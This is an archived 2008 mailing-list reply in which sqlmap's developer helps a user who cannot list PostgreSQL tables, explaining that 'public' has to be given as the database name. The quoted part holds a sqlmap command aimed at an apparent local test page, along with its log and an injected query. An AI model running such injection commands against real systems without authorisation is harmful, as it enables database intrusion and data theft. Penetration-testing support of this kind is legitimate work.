Re: [sqlmap-users] Trouble in enumerating the tables
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Trouble in enumerating the tables
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-21 08:45:05
|
Hi, On Tue, Oct 21, 2008 at 08:09, v4d25f7gb2e7 tgb4sr02be24 <ve7...@gm...> wrote: > ... > C:\My Documents\sqlmap-0.6.1_exe>sqlmap -v 2 --eta -u "http://192.168.0.31/sqlte > st.php?id=1" -s c:\resume.log -D database1 --tables > > sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...> > and Daniele Bellucci <dan...@gm...> > > [*] starting at: 15:54:37 > > [15:54:37] [INFO] resuming injection point 'GET' from session file > [15:54:37] [INFO] resuming injection parameter 'id' from session file > [15:54:37] [INFO] resuming injection type 'numeric' from session file > [15:54:37] [INFO] resuming 0 number of parenthesis from session file > [15:54:37] [INFO] resuming back-end DBMS 'PostgreSQL' from session file > [15:54:37] [INFO] testing connection to the target url > back-end DBMS: PostgreSQL > > [15:54:38] [INFO] fetching tables for database 'database1' > [15:54:38] [INFO] fetching number of tables for database 'database1' > [15:54:38] [INFO] query: SELECT COALESCE(CAST(COUNT(tablename) AS CHARACTER(1000 > 0)), (CHR(32))) FROM pg_tables WHERE schemaname=(CHR(100)||CHR(97)||CHR(116)||CH > R(97)||CHR(98)||CHR(97)||CHR(115)||CHR(101)||CHR(49)) > [15:54:38] [INFO] retrieved: 0 > [15:54:40] [INFO] performed 13 queries in 1 seconds > [15:54:40] [WARNING] unable to retrieve the number of tables for database 'datab > ase1' > [15:54:40] [ERROR] unable to retrieve the tables for any database As you can read from sqlmap documentation online[1] or on the doc/ folder: "Note that on PostgreSQL you have to provide public or the name of a system database because it is not possible to enumerate other databases tables, only the users' schema that the web application's user is connected to, which is always public." So on PostgreSQL if you want to retrieve the tables for the current database provide 'public' as DB name. On others DBMS it works. Refer to sqlmap documentation examples. [1] http://sqlmap.sourceforge.net/doc/README.html#ss5.4 Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
